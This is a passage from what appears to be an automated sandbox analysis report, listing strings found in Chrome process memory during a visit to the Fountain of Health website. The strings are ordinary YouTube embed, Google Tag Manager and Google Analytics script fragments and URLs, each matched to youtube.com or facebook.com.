mbeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true}e":true,"dynamic":true} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var h=tF(a,c,e);O(121);if(h["gtm.elementUrl"]==="https://www.facebook.com/tr/")return O(122),!0;if(d&&f){for(var m=Db(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},wF=function(){var a=[],b=function(c){return hb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
                                  Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cawww.youtube.com_default equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cawww.youtube.com_default+ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: cs.prototype.logTrace=function(B){this.encoder.reset();this.encoder.add(1);this.encoder.add(B.resources.length);for(var z=g.d(B.resources),T=z.next();!T.done;T=z.next()){T=T.value.replace("https://www.youtube.com/s/","");this.encoder.add(T.length);for(var R=0;R<T.length;R++)this.encoder.add(T.charCodeAt(R))}this.encoder.add(B.frames.length);z=g.d(B.frames);for(T=z.next();!T.done;T=z.next()){T=T.value;this.encoder.add(T.name.length);for(R=0;R<T.name.length;R++)this.encoder.add(T.name.charCodeAt(R)); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: e=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: e=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRA5D8 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si= equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaXA492 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2329891050.000028EC04A68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 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
                                  Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmpString found in binary or memory: event?alt=jsonrentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: fcoof/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331272566.000028EC0578B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: g.I.getVideoUrl=function(B,z,T,R,h,W,b){z={list:z};T&&(h?z.time_continue=T:z.t=T);T=b?"music.youtube.com":g.Of(this);h=T==="www.youtube.com";!W&&R&&h?W="https://youtu.be/"+B:g.vo(this)?(W="https://"+T+"/fire",z.v=B):(W&&h?(W=this.protocol+"://"+T+"/shorts/"+B,R&&(z.feature="share")):(W=this.protocol+"://"+T+"/watch",z.v=B),XJ&&(B=fc5())&&(z.ebc=B));return g.Qn(W,z)}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: g.I.y$u=function(){switch(this.Y.getStatus()){case 1:$c(this,"readable");break;case 5:case 6:case 4:case 7:case 3:$c(this,"error");break;case 8:$c(this,"close");break;case 2:$c(this,"end")}};e6B.prototype.serverStreaming=function(B,z,T,R){var h=this,W=B.substring(0,B.length-R.name.length);return htK(function(b){var l=b.q3,w=b.getMetadata(),q=BWz(h,!1);w=ztd(h,w,q,W+l.getName());var c=TWr(q,l.U,!0);b=l.T(b.nj);q.send(w,"POST",b);return c},this.XR).call(this,R.L(z,T))};WWX.prototype.create=function(B,z){return H45(this.T,this.U+"/$rpc/google.internal.waa.v1.Waa/Create",B,z||{},vPq)};var bhz="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),YnY=/\bocr\b/;var w0P=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;Object.assign({},{attributes:{},handleError:function(B){throw B;}},{QTE:!0, equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: g.Of=function(B){B=mR(B.yW);return B==="www.youtube-nocookie.com"?"www.youtube.com":B}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: g.Ti=function(B){var z=g.Of(B);MZz.includes(z)&&(z="www.youtube.com");return B.protocol+"://"+z}; equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: http://localhost:64111/browse>6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmpString found in binary or memory: http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
                                  Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/g/collect?v=2&tid=G-WF39Z4TEVT&gtm=45je55k1v9134219030za200&_p=1747926388605&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101509157~103116026~103130495~103130497~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116~104506547&gdid=dMDhkMT&cid=1981881509.1747926276&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&_eu=AEAAAAQ&_s=2&sid=1747926276&sct=1&seg=1&dl=https%3A%2F%2Ffountainofhealth.ca%2Fen&dt=Home%20%7C%20Fountain%20of%20Health&en=scroll&ep.page_placeholder=PLACEHOLDER_page_location&epn.percent_scrolled=90&_et=5&tfd=6282ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.ca_default equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484765709.000028EC03728000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX286FD"} equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXM$ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXdator equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXer( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXlerdler equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXr equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2375119488.000028EC06930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2370628411.000028EC0391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws*! equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws.Other equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsatorr equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdator equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsdler7 equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000003.2377854851.000028EC025DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377894851.000028EC0391B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR( equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR31UEST equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRc); equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2488324966.000028EC03C88000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?cDRRTQ equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2482154688.000028EC03418000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?oFXXFw equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2498520306.000028EC05C04000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/generate_204?xfMLzA equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/kmbjdnl equals www.youtube.com (Youtube)
                                  Source: chrome.exe, 00000000.00000002.2482360375.000028EC03454000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2480220469.000028EC032B4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487008035.000028EC03A6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
